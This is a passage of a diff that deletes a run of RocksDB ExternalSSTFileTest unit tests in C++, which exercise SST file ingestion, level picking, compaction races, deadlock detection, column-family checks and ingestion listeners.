-       "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Flush 4 files containing the same keys
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put(Key(3), Key(3) + "put"));
-    ASSERT_OK(Put(Key(8), Key(8) + "put"));
-    true_data[Key(3)] = Key(3) + "put";
-    true_data[Key(8)] = Key(8) + "put";
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for BackgroundCompaction() to be called
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:0");
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:1");
-
-  EXPECT_EQ(FilesPerLevel(), "4,0,1,1");
-
-  // This file overlaps with file 0 (L3), file 1 (L2) and the
-  // output of compaction going to L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {4, 7}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,1,1");
-
-  // This file does not overlap with any file or with the running compaction
-  ASSERT_OK(GenerateAndAddExternalFile(options, {9000, 9001}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,1,2");
-
-  // Hold compaction from finishing
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:2");
-
-  dbfull()->TEST_WaitForCompact();
-  EXPECT_EQ(FilesPerLevel(), "1,1,1,2");
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevelBug) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 3;
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  std::vector<int> file_keys;
-
-  // file #1 in L0
-  file_keys = {0, 5, 7};
-  for (int k : file_keys) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-  }
-  ASSERT_OK(Flush());
-
-  // file #2 in L0
-  file_keys = {4, 6, 8, 9};
-  for (int k : file_keys) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-  }
-  ASSERT_OK(Flush());
-
-  // We have 2 overlapping files in L0
-  EXPECT_EQ(FilesPerLevel(), "2");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::AddFile:MutexLock", "ExternalSSTFileTest::PickedLevelBug:0"},
-       {"ExternalSSTFileTest::PickedLevelBug:1", "DBImpl::AddFile:MutexUnlock"},
-       {"ExternalSSTFileTest::PickedLevelBug:2",
-        "DBImpl::RunManualCompaction:0"},
-       {"ExternalSSTFileTest::PickedLevelBug:3",
-        "DBImpl::RunManualCompaction:1"}});
-
-  std::atomic<bool> bg_compact_started(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:Start",
-      [&](void* arg) { bg_compact_started.store(true); });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // While writing the MANIFEST start a thread that will ask for compaction
-  rocksdb::port::Thread bg_compact([&]() {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  });
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:2");
-
-  // Start a thread that will ingest a new file
-  rocksdb::port::Thread bg_addfile([&]() {
-    file_keys = {1, 2, 3};
-    ASSERT_OK(GenerateAndAddExternalFile(options, file_keys, 1));
-  });
-
-  // Wait for AddFile to start picking levels and writing MANIFEST
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:0");
-
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:3");
-
-  // We need to verify that no compactions can run while AddFile is
-  // ingesting the files into the levels it find suitable. So we will
-  // wait for 2 seconds to give a chance for compactions to run during
-  // this period, and then make sure that no compactions where able to run
-  env_->SleepForMicroseconds(1000000 * 2);
-  ASSERT_FALSE(bg_compact_started.load());
-
-  // Hold AddFile from finishing writing the MANIFEST
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:1");
-
-  bg_addfile.join();
-  bg_compact.join();
-
-  dbfull()->TEST_WaitForCompact();
-
-  int total_keys = 0;
-  Iterator* iter = db_->NewIterator(ReadOptions());
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    total_keys++;
-  }
-  ASSERT_EQ(total_keys, 10);
-
-  delete iter;
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, CompactDuringAddFileRandom) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  std::function<void()> bg_compact = [&]() {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  };
-
-  int range_id = 0;
-  std::vector<int> file_keys;
-  std::function<void()> bg_addfile = [&]() {
-    ASSERT_OK(GenerateAndAddExternalFile(options, file_keys, range_id));
-  };
-
-  std::vector<port::Thread> threads;
-  while (range_id < 5000) {
-    int range_start = range_id * 10;
-    int range_end = range_start + 10;
-
-    file_keys.clear();
-    for (int k = range_start + 1; k < range_end; k++) {
-      file_keys.push_back(k);
-    }
-    ASSERT_OK(Put(Key(range_start), Key(range_start)));
-    ASSERT_OK(Put(Key(range_end), Key(range_end)));
-    ASSERT_OK(Flush());
-
-    if (range_id % 10 == 0) {
-      threads.emplace_back(bg_compact);
-    }
-    threads.emplace_back(bg_addfile);
-
-    for (auto& t : threads) {
-      t.join();
-    }
-    threads.clear();
-
-    range_id++;
-  }
-
-  for (int rid = 0; rid < 5000; rid++) {
-    int range_start = rid * 10;
-    int range_end = range_start + 10;
-
-    ASSERT_EQ(Get(Key(range_start)), Key(range_start)) << rid;
-    ASSERT_EQ(Get(Key(range_end)), Key(range_end)) << rid;
-    for (int k = range_start + 1; k < range_end; k++) {
-      std::string v = Key(k) + ToString(rid);
-      ASSERT_EQ(Get(Key(k)), v) << rid;
-    }
-  }
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevelDynamic) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-  std::map<std::string, std::string> true_data;
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ExternalSSTFileTest::PickedLevelDynamic:0",
-       "BackgroundCallCompaction:0"},
-      {"DBImpl::BackgroundCompaction:Start",
-       "ExternalSSTFileTest::PickedLevelDynamic:1"},
-      {"ExternalSSTFileTest::PickedLevelDynamic:2",
-       "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Flush 4 files containing the same keys
-  for (int i = 0; i < 4; i++) {
-    for (int k = 20; k <= 30; k++) {
-      ASSERT_OK(Put(Key(k), Key(k) + "put"));
-      true_data[Key(k)] = Key(k) + "put";
-    }
-    for (int k = 50; k <= 60; k++) {
-      ASSERT_OK(Put(Key(k), Key(k) + "put"));
-      true_data[Key(k)] = Key(k) + "put";
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for BackgroundCompaction() to be called
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:0");
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:1");
-
-  // This file overlaps with the output of the compaction (going to L3)
-  // so the file will be added to L0 since L3 is the base level
-  ASSERT_OK(GenerateAndAddExternalFile(options, {31, 32, 33, 34}, -1, false,
-                                       false, &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5");
-
-  // This file does not overlap with the current running compactiong
-  ASSERT_OK(GenerateAndAddExternalFile(options, {9000, 9001}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,0,1");
-
-  // Hold compaction from finishing
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:2");
-
-  // Output of the compaction will go to L3
-  dbfull()->TEST_WaitForCompact();
-  EXPECT_EQ(FilesPerLevel(), "1,0,0,2");
-
-  Close();
-  options.disable_auto_compactions = true;
-  Reopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 15, 19}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,3");
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1000, 1001, 1002}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,4");
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {500, 600, 700}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,5");
-
-  // File 5 overlaps with file 2 (L3 / base level)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 10}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "2,0,0,5");
-
-  // File 6 overlaps with file 2 (L3 / base level) and file 5 (L0)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {3, 9}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "3,0,0,5");
-
-  // Verify data in files
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  // Write range [5 => 10] to L0
-  for (int i = 5; i <= 10; i++) {
-    std::string k = Key(i);
-    std::string v = k + "put";
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-  ASSERT_OK(Flush());
-  ASSERT_EQ(FilesPerLevel(), "4,0,0,5");
-
-  // File 7 overlaps with file 4 (L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {650, 651, 652}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "5,0,0,5");
-
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, AddExternalSstFileWithCustomCompartor) {
-  Options options = CurrentOptions();
-  options.comparator = ReverseBytewiseComparator();
-  DestroyAndReopen(options);
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // Generate files with these key ranges
-  // {14  -> 0}
-  // {24 -> 10}
-  // {34 -> 20}
-  // {44 -> 30}
-  // ..
-  std::vector<std::string> generated_files;
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = sst_files_dir_ + env_->GenerateUniqueId();
-    ASSERT_OK(sst_file_writer.Open(file_name));
-
-    int range_end = i * 10;
-    int range_start = range_end + 15;
-    for (int k = (range_start - 1); k >= range_end; k--) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k)));
-    }
-    ExternalSstFileInfo file_info;
-    ASSERT_OK(sst_file_writer.Finish(&file_info));
-    generated_files.push_back(file_name);
-  }
-
-  std::vector<std::string> in_files;
-
-  // These 2nd and 3rd files overlap with each other
-  in_files = {generated_files[0], generated_files[4], generated_files[5],
-              generated_files[7]};
-  ASSERT_NOK(DeprecatedAddFile(in_files));
-
-  // These 2 files dont overlap with each other
-  in_files = {generated_files[0], generated_files[2]};
-  ASSERT_OK(DeprecatedAddFile(in_files));
-
-  // These 2 files dont overlap with each other but overlap with keys in DB
-  in_files = {generated_files[3], generated_files[7]};
-  ASSERT_NOK(DeprecatedAddFile(in_files));
-
-  // Files dont overlap and dont overlap with DB key range
-  in_files = {generated_files[4], generated_files[6], generated_files[8]};
-  ASSERT_OK(DeprecatedAddFile(in_files));
-
-  for (int i = 0; i < 100; i++) {
-    if (i % 20 <= 14) {
-      ASSERT_EQ(Get(Key(i)), Key(i));
-    } else {
-      ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-    }
-  }
-}
-
-TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  options.IncreaseParallelism(20);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 4}, 1));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 3}, 2));  // L2
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {10, 14}, 3));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {12, 13}, 4));  // L2
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {20, 24}, 5));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6));  // L2
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        // fit in L3 but will overlap with compaction so will be added
-        // to L2 but a compaction will trivially move it to L3
-        // and break LSM consistency
-        ASSERT_OK(dbfull()->SetOptions({{"max_bytes_for_level_base", "1"}}));
-        ASSERT_OK(GenerateAndAddExternalFile(options, {15, 16}, 7));
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  dbfull()->TEST_WaitForCompact();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, CompactAddedFiles) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 10}, 1));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 9}, 2));   // L2
-  ASSERT_OK(GenerateAndAddExternalFile(options, {3, 8}, 3));   // L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {4, 7}, 4));   // L0
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-}
-
-TEST_F(ExternalSSTFileTest, SstFileWriterNonSharedKeys) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  std::string file_path = sst_files_dir_ + "/not_shared";
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  std::string suffix(100, 'X');
-  ASSERT_OK(sst_file_writer.Open(file_path));
-  ASSERT_OK(sst_file_writer.Put("A" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("BB" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CC" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CXD" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CZZZ" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("ZAAAX" + suffix, "VAL"));
-
-  ASSERT_OK(sst_file_writer.Finish());
-  ASSERT_OK(DeprecatedAddFile({file_path}));
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoRandomized) {
-  Options options = CurrentOptions();
-  options.IncreaseParallelism(20);
-  options.level0_slowdown_writes_trigger = 256;
-  options.level0_stop_writes_trigger = 256;
-
-  for (int iter = 0; iter < 2; iter++) {
-    bool write_to_memtable = (iter == 0);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    std::map<std::string, std::string> true_data;
-    for (int i = 0; i < 2000; i++) {
-      std::vector<std::pair<std::string, std::string>> random_data;
-      for (int j = 0; j < 100; j++) {
-        std::string k;
-        std::string v;
-        test::RandomString(&rnd, rnd.Next() % 20, &k);
-        test::RandomString(&rnd, rnd.Next() % 50, &v);
-        random_data.emplace_back(k, v);
-      }
-
-      if (write_to_memtable && rnd.OneIn(4)) {
-        // 25% of writes go through memtable
-        for (auto& entry : random_data) {
-          ASSERT_OK(Put(entry.first, entry.second));
-          true_data[entry.first] = entry.second;
-        }
-      } else {
-        ASSERT_OK(GenerateAndAddExternalFile(options, random_data, -1, true,
-                                             true, &true_data));
-      }
-    }
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    VerifyDBFromMap(true_data, &kcnt, false);
-  }
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoAssignedLevel) {
-  Options options = CurrentOptions();
-  options.num_levels = 5;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  std::vector<std::pair<std::string, std::string>> file_data;
-  std::map<std::string, std::string> true_data;
-
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-
-  // Insert 0 -> 20 using AddFile
-  file_data.clear();
-  for (int i = 0; i <= 20; i++) {
-    file_data.emplace_back(Key(i), "L4");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file dont overlap with anything in the DB, will go to L4
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel());
-
-  // Insert 80 -> 130 using AddFile
-  file_data.clear();
-  for (int i = 80; i <= 130; i++) {
-    file_data.emplace_back(Key(i), "L0");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file overlap with the memtable, so it will flush it and add
-  // it self to L0
-  ASSERT_EQ("2,0,0,0,1", FilesPerLevel());
-
-  // Insert 30 -> 50 using AddFile
-  file_data.clear();
-  for (int i = 30; i <= 50; i++) {
-    file_data.emplace_back(Key(i), "L4");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file dont overlap with anything in the DB and fit in L4 as well
-  ASSERT_EQ("2,0,0,0,2", FilesPerLevel());
-
-  // Insert 10 -> 40 using AddFile
-  file_data.clear();
-  for (int i = 10; i <= 40; i++) {
-    file_data.emplace_back(Key(i), "L3");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file overlap with files in L4, we will ingest it in L3
-  ASSERT_EQ("2,0,0,1,2", FilesPerLevel());
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoMemtableFlush) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  uint64_t entries_in_memtable;
-  std::map<std::string, std::string> true_data;
-
-  for (int k : {10, 20, 40, 80}) {
-    ASSERT_OK(Put(Key(k), "memtable"));
-    true_data[Key(k)] = "memtable";
-  }
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // No need for flush
-  ASSERT_OK(GenerateAndAddExternalFile(options, {90, 100, 110}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // This file will flush the memtable
-  ASSERT_OK(GenerateAndAddExternalFile(options, {19, 20, 21}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_EQ(entries_in_memtable, 0);
-
-  for (int k : {200, 201, 205, 206}) {
-    ASSERT_OK(Put(Key(k), "memtable"));
-    true_data[Key(k)] = "memtable";
-  }
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // No need for flush, this file keys fit between the memtable keys
-  ASSERT_OK(GenerateAndAddExternalFile(options, {202, 203, 204}, -1, true,
-                                       false, &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // This file will flush the memtable
-  ASSERT_OK(GenerateAndAddExternalFile(options, {206, 207}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_EQ(entries_in_memtable, 0);
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-
-TEST_F(ExternalSSTFileTest, L0SortingIssue) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-  std::map<std::string, std::string> true_data;
-
-  ASSERT_OK(Put(Key(1), "memtable"));
-  ASSERT_OK(Put(Key(10), "memtable"));
-
-  // No Flush needed, No global seqno needed, Ingest in L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {7, 8}, -1, true, false));
-  // No Flush needed, but need a global seqno, Ingest in L0
-  ASSERT_OK(GenerateAndAddExternalFile(options, {7, 8}, -1, true, false));
-  printf("%s\n", FilesPerLevel().c_str());
-
-  // Overwrite what we added using external files
-  ASSERT_OK(Put(Key(7), "memtable"));
-  ASSERT_OK(Put(Key(8), "memtable"));
-
-  // Read values from memtable
-  ASSERT_EQ(Get(Key(7)), "memtable");
-  ASSERT_EQ(Get(Key(8)), "memtable");
-
-  // Flush and read from L0
-  ASSERT_OK(Flush());
-  printf("%s\n", FilesPerLevel().c_str());
-  ASSERT_EQ(Get(Key(7)), "memtable");
-  ASSERT_EQ(Get(Key(8)), "memtable");
-}
-
-TEST_F(ExternalSSTFileTest, CompactionDeadlock) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 4;
-  DestroyAndReopen(options);
-
-  // atomic conter of currently running bg threads
-  std::atomic<int> running_threads(0);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBImpl::DelayWrite:Wait", "ExternalSSTFileTest::DeadLock:0"},
-      {"ExternalSSTFileTest::DeadLock:1", "DBImpl::AddFile:Start"},
-      {"DBImpl::AddFile:MutexLock", "ExternalSSTFileTest::DeadLock:2"},
-      {"ExternalSSTFileTest::DeadLock:3", "BackgroundCallCompaction:0"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start ingesting and extrnal file in the background
-  rocksdb::port::Thread bg_ingest_file([&]() {
-    running_threads += 1;
-    ASSERT_OK(GenerateAndAddExternalFile(options, {5, 6}));
-    running_threads -= 1;
-  });
-
-  ASSERT_OK(Put(Key(1), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(2), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(3), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(4), "memtable"));
-  ASSERT_OK(Flush());
-
-  // This thread will try to insert into the memtable but since we have 4 L0
-  // files this thread will be blocked and hold the writer thread
-  rocksdb::port::Thread bg_block_put([&]() {
-    running_threads += 1;
-    ASSERT_OK(Put(Key(10), "memtable"));
-    running_threads -= 1;
-  });
-
-  // Make sure DelayWrite is called first
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:0");
-
-  // `DBImpl::AddFile:Start` will wait until we be here
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:1");
-
-  // Wait for IngestExternalFile() to start and aquire mutex
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:2");
-
-  // Now let compaction start
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:3");
-
-  // Wait for max 5 seconds, if we did not finish all bg threads
-  // then we hit the deadlock bug
-  for (int i = 0; i < 10; i++) {
-    if (running_threads.load() == 0) {
-      break;
-    }
-    env_->SleepForMicroseconds(500000);
-  }
-
-  ASSERT_EQ(running_threads.load(), 0);
-
-  bg_ingest_file.join();
-  bg_block_put.join();
-}
-
-TEST_F(ExternalSSTFileTest, DirtyExit) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  std::string file_path = sst_files_dir_ + "/dirty_exit";
-  std::unique_ptr<SstFileWriter> sst_file_writer;
-
-  // Destruct SstFileWriter without calling Finish()
-  sst_file_writer.reset(new SstFileWriter(EnvOptions(), options));
-  ASSERT_OK(sst_file_writer->Open(file_path));
-  sst_file_writer.reset();
-
-  // Destruct SstFileWriter with a failing Finish
-  sst_file_writer.reset(new SstFileWriter(EnvOptions(), options));
-  ASSERT_OK(sst_file_writer->Open(file_path));
-  ASSERT_NOK(sst_file_writer->Finish());
-}
-
-TEST_F(ExternalSSTFileTest, FileWithCFInfo) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"koko", "toto"}, options);
-
-  SstFileWriter sfw_default(EnvOptions(), options, handles_[0]);
-  SstFileWriter sfw_cf1(EnvOptions(), options, handles_[1]);
-  SstFileWriter sfw_cf2(EnvOptions(), options, handles_[2]);
-  SstFileWriter sfw_unknown(EnvOptions(), options);
-
-  // default_cf.sst
-  const std::string cf_default_sst = sst_files_dir_ + "/default_cf.sst";
-  ASSERT_OK(sfw_default.Open(cf_default_sst));
-  ASSERT_OK(sfw_default.Put("K1", "V1"));
-  ASSERT_OK(sfw_default.Put("K2", "V2"));
-  ASSERT_OK(sfw_default.Finish());
-
-  // cf1.sst
-  const std::string cf1_sst = sst_files_dir_ + "/cf1.sst";
-  ASSERT_OK(sfw_cf1.Open(cf1_sst));
-  ASSERT_OK(sfw_cf1.Put("K3", "V1"));
-  ASSERT_OK(sfw_cf1.Put("K4", "V2"));
-  ASSERT_OK(sfw_cf1.Finish());
-
-  // cf_unknown.sst
-  const std::string unknown_sst = sst_files_dir_ + "/cf_unknown.sst";
-  ASSERT_OK(sfw_unknown.Open(unknown_sst));
-  ASSERT_OK(sfw_unknown.Put("K5", "V1"));
-  ASSERT_OK(sfw_unknown.Put("K6", "V2"));
-  ASSERT_OK(sfw_unknown.Finish());
-
-  IngestExternalFileOptions ifo;
-
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[0], {cf1_sst}, ifo));
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[2], {cf1_sst}, ifo));
-  // SST CF match
-  ASSERT_OK(db_->IngestExternalFile(handles_[1], {cf1_sst}, ifo));
-
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[1], {cf_default_sst}, ifo));
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[2], {cf_default_sst}, ifo));
-  // SST CF match
-  ASSERT_OK(db_->IngestExternalFile(handles_[0], {cf_default_sst}, ifo));
-
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[1], {unknown_sst}, ifo));
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[2], {unknown_sst}, ifo));
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[0], {unknown_sst}, ifo));
-
-  // Cannot ingest a file into a dropped CF
-  ASSERT_OK(db_->DropColumnFamily(handles_[1]));
-  ASSERT_NOK(db_->IngestExternalFile(handles_[1], {unknown_sst}, ifo));
-
-  // CF was not dropped, ok to Ingest
-  ASSERT_OK(db_->IngestExternalFile(handles_[2], {unknown_sst}, ifo));
-}
-
-class TestIngestExternalFileListener : public EventListener {
- public:
-  void OnExternalFileIngested(DB* db,
-                              const ExternalFileIngestionInfo& info) override {
-    ingested_files.push_back(info);
-  }
-
-  std::vector<ExternalFileIngestionInfo> ingested_files;
-};
-
-TEST_F(ExternalSSTFileTest, IngestionListener) {
-  Options options = CurrentOptions();
-  TestIngestExternalFileListener* listener =
-      new TestIngestExternalFileListener();
-  options.listeners.emplace_back(listener);
-  CreateAndReopenWithCF({"koko", "toto"}, options);
-
-  // Ingest into default cf
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[0]));
-  ASSERT_EQ(listener->ingested_files.size(), 1);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "default");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "default");
-
-  // Ingest into cf1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[1]));
-  ASSERT_EQ(listener->ingested_files.size(), 2);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "koko");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            1);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "koko");
-
-  // Ingest into cf2
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[2]));
-  ASSERT_EQ(listener->ingested_files.size(), 3);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "toto");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            2);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "toto");
-}
-
-TEST_F(ExternalSSTFileTest, SnapshotInconsistencyBug) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  const int kNumKeys = 10000;
-
-  // Insert keys using normal path and take a snapshot
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(Put(Key(i), Key(i) + "_V1"));
-  }
-  const Snapshot* snap = db_->GetSnapshot();
-
-  // Overwrite all keys using IngestExternalFile
-  std::string sst_file_path = sst_files_dir_ + "file1.sst";
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-  ASSERT_OK(sst_file_writer.Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
